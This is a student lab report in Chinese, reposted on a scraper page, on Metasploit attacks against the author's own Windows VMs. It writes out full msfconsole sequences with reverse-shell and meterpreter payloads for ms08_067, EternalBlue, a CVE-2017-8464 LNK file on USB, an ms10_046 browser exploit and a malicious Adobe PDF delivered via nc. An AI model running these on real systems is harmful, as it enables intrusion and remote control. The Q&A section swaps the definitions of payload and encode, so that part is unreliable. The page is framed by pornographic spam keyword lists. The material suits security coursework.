日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Exp5 MSF基础应用 20164309 欧阳彧骁

發布時間:2024/4/24 编程问答 110 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Exp5 MSF基础应用 20164309 欧阳彧骁 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?

1.實驗內容

1.0Armitage初體驗

kali端輸入?armitage?啟動armitage

發現開啟失敗,更根據提示先輸入?/etc/init.d/postgresql start?,打開postgresql服務再進入armitage

更改端口為學號4309,其他選項默認不變

?

進入界面發現沒有可以攻擊的主機

?

選擇上方菜單欄hosts-nmap scan-quick scan(os detect)進行掃描

對虛擬機所在的網段進行掃描

?

選中靶機,右鍵選擇services,查看可以利用的端口

右鍵選擇scan進行掃描

選擇上方菜單欄attacks-findattacks

?

可以進行攻擊了!

對win7端攻擊失敗后,我增添了一臺xp sp3繼續進行實驗;

選中目標主機右鍵attack-smb-ms08_067_netapi

?

在攻擊win7失敗后,我下載了一個xp進行實驗,攻擊仍然失敗,猜測應該是與xp系統的中英文版本有關,中文盜版猖獗,每次有新補丁盜版方還會貼心地給用戶打上。。。

重新下載一個windows2003 server sp2,進行相關攻擊

?

2003端仍然失敗,重新在windows 2000 sp4上實驗還是失敗,也許不是系統版本與相關補丁的問題,可能是kali上的armitage配置出現了一些問題,暫時排除不了具體原因,還是用老辦法msfconsole繼續實驗吧。

?

1.1三個主動攻擊實踐+成功應用任何一個輔助模塊+唯一

1.1.1 ms08_067_netapi

攻擊端:kali 2019 192.168.236.131

靶機:win 2000 sp4 192.168.236.143

輸入?msfconsole?

輸入?search ms08_067?,查找可用的exploit

輸入 use exploit/windows/smb/ms08_067_netapi?

?輸入?show payloads? 對可使用的payload進行查找,這里我使用generic/shell_reverse_tcp

?

輸入?set payload generic/shell_reverse_tcp?

配置攻擊源地址源端口與目的地址?

set RHOST 192.168.236.143 set LPORT 4309 set LHOST 192.168.236.131

輸入?show options?查看具體信息

?

輸入?exploit 進行滲透攻擊

攻擊成功?

1.1.2 ms17_010_eternalblue+ auxiliary輔助模塊掃描

攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶機:Win 7 旗艦版 ip:192.168.236.128

還是沒有死心,打算再次使用armitage實驗。

選中靶機,在armitage左側目錄中選擇exploit-windows-smb-ms_010_eternalblue

看似是攻擊成功了,但是在連接sessions與調用meterpreter shell是出現了問題,看來應該是我kali中armitage工具不夠完善。還是乖乖滾回去用msf吧。

?進入msfconsole

輸入?search ms17 type: auxiliary platform:windows?查找永恒之藍的auxiliary輔助模塊掃描指令

輸入?use auxiliary/scanner/smb/smb_ms17_010 ?

輸入?set RHOSTS 192.168.239.129? 設置目標地址

輸入?run 進行掃描

能夠建立連接,開始正式攻擊

use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/shell/reverse_tcp set RHOST 192.168.236.128 set LPORT 4309 set LHOST 192.168.236.131 show options exploit

攻擊成功。?

1.1.3 cve 2017_8464 (震網三代) (唯一)

use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 exploit

輸入?cp -r /root/.msf4/local/ /root/1 將生成的文件從隱藏文件夾中復制出來

將文件導出至U盤,連接到靶機中。

?

kali端進行監聽:

search multi/handler use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 run

在靶機運行U盤中的FlashPlayerCPLAPP.cpl

攻擊成功。

?

1.2 一個針對瀏覽器的攻擊:ms10_046

攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶機:Win xp ps3 ip:192.168.236.134

?進入msfconsole

輸入?search ms10_046?

輸入?use exploit/windows/browser/ms10_046_shortcut_icon_dllloader?

?

set payload windows/meterpreter/reverse_http set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 show options exploit

靶機連接http://192.168.236.131:80/

輸入??session -i 1? 連接id為1的session獲取shell

?

攻擊成功。

1.3 一個針對客戶端的攻擊adobe_pdf_embedded_exe

攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶機:Win xp ps3 ip:192.168.236.134

?進入msfconsole

輸入?search adobe type:exploit platform:windows?查找可用漏洞,這里我選擇了adobe_pdf_embedded_exe

use exploit/windows/fileformat/adobe_pdf_embedded_exe

show payloads?

?

Set payload windows/meterpreter/reverse_tcp set RHOST 192.168.236.134 set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 set FILENAME 20164309.pdf show options exploit

生成文件20164309.pdf

使用nc將文件傳輸到靶機中

ncat.exe -lv 4309 > 20164309.pdf nc 192.168.236.134 4309 < 20164309.pdf

攻擊機中進行監聽

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 set LPORT 4309 exploit

靶機中打開文件,攻擊成功。

2.基礎問題回答

用自己的話解釋什么是exploit,payload,encode.

?Exploit:“利用”,通過漏洞來攻擊受害者,也就是拉貨的馬;

Payload:“編碼”,去掉“壞字符”,為滲透攻擊做準備;改變特征碼,起到免殺作用;也就是貨車;

Encode:“有效負載”、“shellcode”,能夠在受害者環境中進行操作,也就是裝貨的車廂。

整個攻擊過程就是馬拉著裝滿貨物的車送往目的地。

?

?

?3.實踐總結體會

3.1總結體會

本次實驗是我歷時最長的一次實驗,也是收獲最大的一次實驗。包括實驗報告的撰寫實驗五一共花費了我四個晚上的時間,讓我深深明白了什么是自學。在實驗的開始我打算圖方便使用armitage進行自動化攻擊,導致我在不停下載與更換虛擬機上浪費了過多的時間,最后還是沒有排除無法成功應用armitage。其實我還嘗試了WebExec(CVE-2018-15442)與mssql_payload但均以失敗告終,這也讓我感受到了我能力的不足。

3.2離實戰還缺些什么技術或步驟

?缺的東西大了去了,以我的水平只是到應用msf工具的水平,還不能詳細的闡述攻擊的原理;并且meterpreter庫中更新不及時,很多漏洞都及時被windows官方發現與修復,實戰性不強;同時像payload的編寫、encode的設計我們都沒有能力實現,導致攻擊方法單一,水準不夠高。

?

轉載于:https://www.cnblogs.com/20164309-kx/p/10699118.html

總結

以上是生活随笔為你收集整理的Exp5 MSF基础应用 20164309 欧阳彧骁的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 国产视频手机在线 | 亚洲国产av一区二区 | 久久久久久美女 | 正在播放一区二区 | 天降女子在线观看 | 欧美一级片网站 | 亚洲精品在线免费 | 欧洲一区二区三区 | 91网国产| 久久中文字幕无码 | 免费一级片 | 自拍天堂 | 噜噜色图| 色噜噜狠狠一区二区三区果冻 | 色多多导航 | 亲子乱aⅴ一区二区三区 | 亚洲熟悉妇女xxx妇女av | 黑人大群体交免费视频 | 奇米影视777第四色 2019中文字幕在线免费观看 | 成人精品av | 夜夜撸影院 | 香港一级纯黄大片 | 欧美日韩高清 | 精品无码人妻一区二区三区 | 色噜噜一区二区三区 | 男人天堂1024 | 欧美日韩在线中文字幕 | 一级大黄色片 | 午夜不卡福利 | www.一区二区三区 | 国产精品一区二区三区免费视频 | 免费观看一区二区三区毛片 | 久久久久久久网 | 免费网站成人 | 99久久精品国产一区二区成人 | 人人综合网 | 国产精品99久久久久久大便 | 人妻少妇精品无码专区 | 成年人精品 | 国产一级黄 | 在线成人免费电影 | 亚洲欧洲无码一区二区三区 | 国产福利久久 | 91九色偷拍 | 欧美日韩精品久久久 | 欧美日韩电影一区二区三区 | 日本视频免费观看 | 国产精品偷伦视频免费看 | 久操操 | 欧美性生交大片免费看 | 色哟哟一区二区三区 | 性欧美一区二区三区 | 国产伦精品一区二区 | 香港黄色网址 | 国产原创在线视频 | 香蕉色视频| 国产对白羞辱绿帽vk | 欧美高清不卡 | 成人看| 国产一级片毛片 | 国产精品系列在线播放 | 久久久精品人妻一区二区三区色秀 | www.777含羞草 | 精品国产乱码久久久久久蜜臀 | www.97ai.com| 成年人理论片 | 性色综合 | 欧美九九九 | 欧美一区二区在线播放 | 久久不射视频 | 国产精品v日韩精品v在线观看 | 窝窝视频在线观看 | 91久| www.男人的天堂 | 嫩模一区二区三区 | 奶水喷溅 在线播放 | 久久国产精品电影 | 制服丝袜一区二区三区 | 亚洲天堂男人天堂 | 华人色| 午夜黄色网| www.亚洲色图 | 日韩高清不卡在线 | 黄色小说在线免费观看 | 极度诱惑香港电影完整 | 亚洲影视中文字幕 | 九九色播 | 97av在线| 日本中文字幕精品 | 毛片毛片毛片毛片毛片 | 国产精品久久久久影院色老大 | 自拍视频在线观看 | 国产资源免费 | 吖v在线| 一区二区三区小视频 | 一区二区三区四区欧美 | 波多野42部无码喷潮 | 亚洲精品乱码久久久久久日本蜜臀 | 欧美熟妇精品久久久久久 |